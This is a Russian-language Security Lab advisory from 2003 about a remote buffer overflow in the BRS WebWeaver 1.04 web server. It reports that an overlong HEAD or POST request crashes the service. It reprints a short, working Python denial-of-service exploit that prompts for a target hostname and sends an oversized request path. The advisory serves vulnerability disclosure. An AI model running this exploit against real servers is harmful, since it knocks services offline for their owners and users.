Security Lab

Удаленное переполнение буфера в BRS WebWeaver + эксплоит

Дата публикации:30.05.2003
Всего просмотров:1199
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Microsoft Windows 98
Microsoft Windows 98 Second Edition
BRS WebWeaver 1.x
Описание: Два переполнения буфера обнаружены в BRS WebWeaver. Удаленный пользователь может аварийно завершить работу web сервиса.

F0KP сообщает, что удаленный пользователь может послать 32700 символов в HTTP POST или HEAD запросе, чтобы аварийно завершить работу Web сервиса.

Эксплоит:

#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit 
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]: 
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
Уязвимость обнаружена в BRS WebWeaver 1.04
Ссылки: BRS WebWeaver: POST and HEAD Overflaws